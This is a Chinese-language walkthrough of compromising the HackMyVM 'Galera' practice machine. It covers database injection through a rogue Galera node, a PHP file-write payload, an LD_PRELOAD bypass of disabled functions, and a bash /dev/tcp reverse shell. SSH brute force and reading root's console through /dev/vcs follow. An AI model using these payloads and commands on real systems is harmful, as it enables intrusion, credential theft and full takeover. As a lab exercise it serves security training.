hackmyvm galera writeup
端口扫描
└─$ sudo nmap -sT -p- --min-rate 10000 192.168.125.11
[sudo] password for bug:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 22:42 CST
Nmap scan report for 192.168.125.11
Host is up (0.12s latency).
Not shown: 54116 closed tcp ports (conn-refused), 11416 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
4567/tcp open tram
MAC Address: 08:00:27:68:AD:0D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 40.33 seconds
└─$ sudo nmap -sTCV -p22,80,4567 -O 192.168.125.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 22:44 CST
Nmap scan report for 192.168.125.11
Host is up (0.0022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 28:50:32:2f:bb:ef:7e:51:c3:59:cb:e6:40:88:0e:4e (ECDSA)
|_ 256 f3:fa:a1:84:c6:da:fc:09:fe:aa:ca:ec:0a:29:7d:30 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Login
4567/tcp open tram?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4567-TCP:V=7.95%I=7%D=5/25%Time=68332CD5%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2C,"\$\0\0\x02\0\[\x89\xdb\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb97b8
SF:\xe95\(\xeb\xc5n\xe9A9v\x11\xf0\x9d\xb5N\x80\x1e\[\"v")%r(GetRequest,2C
SF:,"\$\0\0\x02\xf2\xd6\x01\x91\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb97b8\
SF:xe95\(\xeb\xc7N&\xd29v\x11\xf0\x87\x7f\?\x05\xf8\+\x9aF")%r(GenericLine
SF:s,2C,"\$\0\0\x02\xd9\xae';\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb97b8\xe
SF:95\(\xeb\xc7U\xa1S9v\x11\xf0\x861G\xf6P\xed\xfe\xec")%r(HTTPOptions,2C,
SF:"\$\0\0\x02\xdf\x0c\xba\x92\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb97b8\x
SF:e95\(\xeb\xc9d\xf7\\9v\x11\xf0\x8a\x98'\xcc\[\xf0C\xbb")%r(RTSPRequest,
SF:2C,"\$\0\0\x02\x94\)\xb9i\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb97b8\xe9
SF:5\(\xeb\xc9f\x96>9v\x11\xf0\x9f\xe3V\x82\xb2\xfb\x82\xae")%r(RPCCheck,2
SF:C,"\$\0\0\x024\x0f&\xf3\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb97b8\xe95\
SF:(\xeb\xc9g\xf1\xf39v\x11\xf0\xbbZnf\x93L\x1d\xc8")%r(DNSVersionBindReqT
SF:CP,2C,"\$\0\0\x02\|D\xf5f\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb97b8\xe9
SF:5\(\xeb\xc9h\xf3b9v\x11\xf0\xa7\x87\x17\xfd\x9e\x06\xf3\]")%r(DNSStatus
SF:RequestTCP,2C,"\$\0\0\x02\x0cV-\xea\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\
SF:xb97b8\xe95\(\xeb\xc9i\xe9\.9v\x11\xf0\xb2\xad\xe7\x9f0\x04\xa0\xa1")%r
SF:(Help,2C,"\$\0\0\x02\x84I\xec\xb0\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb
SF:97b8\xe95\(\xeb\xcb\|\x08{9v\x11\xf0\x8a\xf4\xba\xd8\x82b\x94\xc6")%r(S
SF:SLSessionReq,2C,"\$\0\0\x02\x1cL\xe9\.\0\x01\x10\0\xd1L\xady7\xef\x11\x
SF:f0\xb97b8\xe95\(\xeb\xcd\x92\xaa=9v\x11\xf0\x94o\x9a5o\xe4\x1a,")%r(Ter
SF:minalServerCookie,2C,"\$\0\0\x02\x84\xeb''\0\x01\x10\0\xd1L\xady7\xef\x
SF:11\xf0\xb97b8\xe95\(\xeb\xcf`\xbb\x829v\x11\xf0\xbb\xc1\xda\xf8\xc7lux"
SF:)%r(TLSSessionReq,2C,"\$\0\0\x02\xe2\(\x89N\0\x01\x10\0\xd1L\xady7\xef\
SF:x11\xf0\xb97b8\xe95\(\xeb\xcfb\x06g9v\x11\xf0\xb3\xe1\xfb\xf0aHI\xd7")%
SF:r(Kerberos,2C,"\$\0\0\x02M\xe7\(\xac\0\x01\x10\0\xd1L\xady7\xef\x11\xf0
SF:\xb97b8\xe95\(\xeb\xd12\n\x199v\x11\xf0\xb5\xa4'\+\t\x98\x11\x9f")%r(SM
SF:BProgNeg,2C,"\$\0\0\x02\x10B\xfe\xf9\0\x01\x10\0\xd1L\xady7\xef\x11\xf0
SF:\xb97b8\xe95\(\xeb\xd12\xc0\xc69v\x11\xf0\xaf\xf5\?\x9e\[\x03\xfb&")%r(
SF:X11Probe,2C,"\$\0\0\x02x\xd2\x8d@\0\x01\x10\0\xd1L\xady7\xef\x11\xf0\xb
SF:97b8\xe95\(\xeb\xd14\xbd\xc99v\x11\xf0\x87\x1b\xef\x9f\x19=\n\xaf");
MAC Address: 08:00:27:68:AD:0D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.90 seconds
web部分
4567是个奇怪的端口,问了一下deepseek 靶机名galera的意思,它说是mysql的一个插件,支持分布式数据库,猜测这里要连接靶机的集群节点,问一下deepseek怎么配置galera节点,配置my.cnf来尝试连接:
[mysqld]
# 基础配置
binlog_format=ROW
default-storage-engine=InnoDB
innodb_autoinc_lock_mode=2
bind-address=0.0.0.0 # 允许远程访问(生产环境应限制IP)
# Galera 配置
wsrep_on=ON
wsrep_provider=/usr/lib/galera/libgalera_smm.so
wsrep_cluster_address="gcomm://192.168.125.11"
wsrep_node_address="192.168.125.5"
wsrep_node_name="nodeX"
wsrep_sst_method=rsync
重启mariadb
sudo systemctl restart mariadb
进入mysql,发现已经出现新的数据库:
sudo mysql
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| galeradb |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.034 sec)
MariaDB [(none)]> show tables in galeradb;
+--------------------+
| Tables_in_galeradb |
+--------------------+
| users |
+--------------------+
1 row in set (0.001 sec)
MariaDB [(none)]> use galeradb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [galeradb]> select * from usrs;
ERROR 1146 (42S02): Table 'galeradb.usrs' doesn't exist
MariaDB [galeradb]> select * from users;
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| id | username | email | password | created_at |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| 1 | admin | admin@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
| 2 | a | <?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
2 rows in set (0.003 sec)
MariaDB [galeradb]> exit;
Bye
(上面的admin用户的密码已经被我修改了,id为2的用户是我进入后创建的),访问一下web
dirsearch简单枚举一下目录及常见文件:
[12:38:57] Starting:
[12:38:58] 403 - 279B - /.ht_wsr.txt
[12:38:58] 403 - 279B - /.htaccess.orig
[12:38:58] 403 - 279B - /.htaccess.bak1
[12:38:58] 403 - 279B - /.htaccess.save
[12:38:58] 403 - 279B - /.htaccess.sample
[12:38:58] 403 - 279B - /.htaccess_extra
[12:38:58] 403 - 279B - /.htaccessBAK
[12:38:58] 403 - 279B - /.htaccess_sc
[12:38:58] 403 - 279B - /.htaccess_orig
[12:38:58] 403 - 279B - /.htaccessOLD2
[12:38:58] 403 - 279B - /.htaccessOLD
[12:38:58] 403 - 279B - /.htm
[12:38:58] 403 - 279B - /.htpasswd_test
[12:38:58] 403 - 279B - /.html
[12:38:58] 403 - 279B - /.htpasswds
[12:38:58] 403 - 279B - /.httr-oauth
[12:38:58] 403 - 279B - /.php
[12:39:03] 200 - 0B - /config.php
[12:39:07] 200 - 22KB - /info.php
[12:39:07] 302 - 0B - /login.php -> /
[12:39:08] 302 - 0B - /logout.php -> index.php
[12:39:10] 403 - 21B - /private.php
[12:39:12] 403 - 279B - /server-status/
[12:39:12] 403 - 279B - /server-status
[12:39:14] 301 - 317B - /upload -> http://192.168.125.11/upload/
[12:39:14] 200 - 0B - /upload/
[12:39:14] 200 - 13B - /upload/test.txt
简单测试了一下,没有找到漏洞,这里的登录用户密码应该就是users表中的数据,那么我们就在表里添加一个用户或者修改admin用户的密码就可以登录了,利用CyberChef生成bcrypt的密码:
在表中创建test用户,密码为123456:
MariaDB [galeradb]> insert into users values(3,'test','test@test.com','$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
Query OK, 1 row affected (0.037 sec)
登录后台:
挖掘后台漏洞点,发现当向用户邮箱插入php代码后,发布消息再点击view时,代码得到了解析,
MariaDB [galeradb]> insert into users values(4,'a',0x3c3f706870206563686f202774657374273b3f3e40612e636f6d,'$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
ERROR 1062 (23000): Duplicate entry 'a' for key 'username'
MariaDB [galeradb]> insert into users values(4,'b',0x3c3f706870206563686f202774657374273b3f3e40612e636f6d,'$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
Query OK, 1 row affected (0.006 sec)
MariaDB [galeradb]> select * from users;
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| id | username | email | password | created_at |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| 1 | admin | admin@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
| 2 | a | <?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
| 3 | test | test@test.com | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
| 4 | b | <?php echo 'test';?>@a.com | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
4 rows in set (0.003 sec)
MariaDB [galeradb]> delete from users where id=2;
Query OK, 1 row affected (0.004 sec)
MariaDB [galeradb]> select * from users;
+----+----------+----------------------------+--------------------------------------------------------------+---------------------+
| id | username | email | password | created_at |
+----+----------+----------------------------+--------------------------------------------------------------+---------------------+
| 1 | admin | admin@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
| 3 | test | test@test.com | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
| 4 | b | <?php echo 'test';?>@a.com | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
+----+----------+----------------------------+--------------------------------------------------------------+---------------------+
3 rows in set (0.001 sec)
确定代码注入点后既可以尝试获取webshell,访问前面枚举出来的info.php,发现disble了许多函数:
exec, shell_exec, system, passthru, proc_open, proc_close, proc_terminate, popen, pcntl_exec, pcntl_fork, pcntl_wait, pcntl_signal, dl, eval, assert, create_function, include, include_once, require_once, show_source, highlight_file, fopen, file, readfile, file_get_contents, fileperms, chmod, chown, chgrp, symlink, link, mail, curl_exec, curl_multi_exec, socket_create, socket_connect, socket_send, socket_recv, stream_socket_client
这里要获取webshell就比较麻烦,但还是可以的,基本思路是利用大佬的这个项目https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
首先我们要想办法把需要的so文件及加载so文件的php文件上传上去,首先我们在数据库中创建一个邮箱为<?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv的用户:
MariaDB [galeradb]> insert into users values(2,'a',0x3c3f7068702066696c655f7075745f636f6e74656e747328245f504f53545b2766275d2c6261736536345f6465636f646528245f504f53545b2764275d29293b3f3e4067616c6572612e686d76,'$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
Query OK, 1 row affected (0.005 sec)
MariaDB [galeradb]> select * from users;
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| id | username | email | password | created_at |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| 1 | admin | admin@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
| 2 | a | <?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
| 3 | test | test@test.com | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
| 4 | b | <?php echo 'test';?>@a.com | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
4 rows in set (0.001 sec)
登录这个用户,发表消息,然后点view抓包:
POST /private.php?view=1 HTTP/1.1
Host: 192.168.125.11
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=pfmerbu964avspkbqf818nhhrn
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
f=upload/bypass3.php&d=content_base
f为要写入文件的相对目录,d为要写入内容的base64编码,注意这里web目录下面只有upload目录可写,用这个办法将bypass3.php和e.so两个文件写入到upload目录下面,bypass3.php的内容:
<?php
echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";
$cmd = $_GET["cmd"];
$out_path = $_GET["outpath"];
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = $_GET["sopath"];
putenv("LD_PRELOAD=" . $so_path);
//mail("", "", "", "");
error_log('123',1,'test@qq.com','')
//echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
//unlink($out_path);
?>
e.so就是https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD这个项目里面的x64的so文件
本地监听:
nc -lnvp 1234
访问:
http://192.168.1.18/upload/bypass3.php?cmd=bash%20%2Dc%20%27exec%20bash%20%2Di%20%26%3E%2Fdev%2Ftcp%2F192%2E168%2E1%2E17%2F1234%20%3C%261%27&outpath=/var/www/html/upload/result.txt&sopath=/var/www/html/upload/e.so
即可获得反弹shell
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.125.5] from (UNKNOWN) [192.168.125.11] 37618
bash: cannot set terminal process group (580): Inappropriate ioctl for device
bash: no job control in this shell
www-data@galera:/var/www/html/upload$ ls -al
ls -al
total 7056
drwxr-xr-x 2 www-data www-data 4096 May 23 20:02 .
drwxr-xr-x 3 root root 4096 May 7 20:34 ..
-rw-r--r-- 1 www-data www-data 582 May 23 14:19 bypass.php
-rw-r--r-- 1 www-data www-data 626 May 23 14:25 bypass2.php
-rw-r--r-- 1 www-data www-data 626 May 23 14:27 bypass3.php
-rw-r--r-- 1 www-data www-data 2350 May 23 13:53 config.txt
-rw-r--r-- 1 www-data www-data 6952 May 23 14:36 e.so
-rw-r--r-- 1 root root 0 May 7 20:35 index.html
-rw-r--r-- 1 www-data www-data 90858 May 23 15:01 less.sh
-rwxr-xr-x 1 www-data www-data 862779 May 23 15:01 linpeas.sh
-rw-r--r-- 1 www-data www-data 87 May 23 20:10 loop.php
-rw-r--r-- 1 www-data www-data 1149 May 23 13:56 passwd.txt
-rw-r--r-- 1 www-data www-data 2869 May 23 14:00 private.txt
-rwxr-xr-x 1 www-data www-data 3104768 May 23 15:06 pspy64
-rw-r--r-- 1 www-data www-data 1022976 May 23 15:05 pspy64_aa
-rw-r--r-- 1 www-data www-data 1022976 May 23 15:05 pspy64_ab
-rw-r--r-- 1 www-data www-data 1022976 May 23 15:05 pspy64_ac
-rw-r--r-- 1 www-data www-data 35840 May 23 15:06 pspy64_ad
-rw-r--r-- 1 www-data www-data 0 May 25 11:31 result.txt
-rw-r--r-- 1 www-data www-data 13 May 23 14:07 test.txt
-rw-r--r-- 1 www-data www-data 1960 May 23 15:00 upload2.php
www-data@galera:/var/www/html/upload$
(里面那些乱七八糟的文件是我后面用来提取上传的)
user
先搜集一波密码:
www-data@galera:/var/www/html$ cat create_admin.php
cat create_admin.php
<?php
require 'config.php';
$username = 'admin';
$email = 'admin@example.com';
$pass_plain = 'SgvKp417lLE1XH8NLfJ3';
$hash = password_hash($pass_plain, PASSWORD_BCRYPT);
$stmt = $pdo->prepare('INSERT INTO users (username, email, password) VALUES (?, ?, ?)');
try {
$stmt->execute([
$username,
$email,
$hash
]);
echo "Usuario 'admin' creado correctamente.";
} catch (PDOException $e) {
if ($e->getCode() === '23000') {
echo "El usuario 'admin' ya existe.";
} else {
error_log($e->getMessage());
echo "Error al crear el usuario.";
}
}
www-data@galera:/var/www/html$ cat config.php
cat config.php
<?php
......
// Database connection parameters
$host = 'localhost';
$db = 'galeradb';
$user = 'galeradbusr';
$pass = '8d7F4TnHRYQaGDjvwUpt';
$charset = 'utf8mb4';
// Data Source Name (DSN)
$dsn = "mysql:host={$host};dbname={$db};charset={$charset}";
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
PDO::ATTR_EMULATE_PREPARES => false,
];
......
/etc/passwd内容:
www-data@galera:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
donjuandeaustria:x:1000:1000:donjuandeaustria,,,:/home/donjuandeaustria:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
应该要先拿到donjuandeaustria,试了一下前面拿到的两个密码,都不对,这里卡了一段时间,最后尝试了一下用rockyou.exe弱口令爆破ssh密码,成功
└─$ hydra -l donjuandeaustria -P ~/Desktop/dict/rockyou_top_10000.txt ssh://192.168.125.11 -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-26 12:59:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking ssh://192.168.125.11:22/
[STATUS] 189.00 tries/min, 189 tries in 00:01h, 9815 to do in 00:52h, 12 active
[22][ssh] host: 192.168.125.11 login: donjuandeaustria password: amorcito
[STATUS] attack finished for 192.168.125.11 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-26 13:02:00
登录ssh
└─$ ssh donjuandeaustria@192.168.125.11
The authenticity of host '192.168.125.11 (192.168.125.11)' can't be established.
ED25519 key fingerprint is SHA256:i74LSOCZyaYgs80MUKyEspadufXaKwm+caBx6pcttAo.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:28: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.125.11' (ED25519) to the list of known hosts.
donjuandeaustria@192.168.125.11's password:
Linux galera 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 23 19:26:18 2025 from 192.168.1.17
donjuandeaustria@galera:~$ cat user.txt
072f****************************
拿到user.txt
root
提权没有做出来,ll104567教我的,【hackmyvm hard Galera靶场复盘】 https://www.bilibili.com/video/BV1DDjKz8EpN/
基本思路该用户输入tty组,
donjuandeaustria@galera:~$ id
uid=1000(donjuandeaustria) gid=1000(donjuandeaustria) groups=1000(donjuandeaustria),5(tty),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
tty组的用户可以观察其他用户的 tty 控制台输出(他们看到的内容),使用w命令查看一下用户登录情况:
donjuandeaustria@galera:~$ w
11:44:51 up 1:17, 2 users, load average: 0.02, 0.08, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty20 - 10:27 1:17m 0.08s 0.06s -bash
donjuand pts/0 192.168.125.5 11:41 1.00s 0.03s 0.02s w
发现root在tty20,那么我们cat /dev/vcs20或者cat /dev/vcsa20就能看到root用户虚拟终端上的内容:
发现了root的密码,登录ssh或者su root,得到root.txt
donjuandeaustria@galera:~$ su root
Password:
root@galera:/home/donjuandeaustria# cat /root.txt
cat: /root.txt: No such file or directory
root@galera:/home/donjuandeaustria# cd /
root@galera:/# cat root.txt
cat: root.txt: No such file or directory
root@galera:/# ls
bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
root@galera:/# cd /root
root@galera:~# ls
root.txt
root@galera:~# cat /root.txt
cat: /root.txt: No such file or directory
root@galera:~# ls -al
total 36
drwx------ 4 root root 4096 May 8 00:05 .
drwxr-xr-x 18 root root 4096 May 4 19:16 ..
lrwxrwxrwx 1 root root 9 May 7 23:05 .bash_history -> /dev/null
-rw-r--r-- 1 root root 603 May 7 23:47 .bashrc
-rw------- 1 root root 20 May 7 23:28 .lesshst
drwxr-xr-x 3 root root 4096 May 4 19:18 .local
-rw------- 1 root root 13 May 7 23:48 .mysql_history
-rw------- 1 root root 682 May 7 21:57 .profile
-rw------- 1 root root 33 May 7 22:18 root.txt
drwx------ 2 root root 4096 May 4 19:15 .ssh
root@galera:~# cat $(ls roo*)
6a0d424**********************
浙公网安备 33010602011771号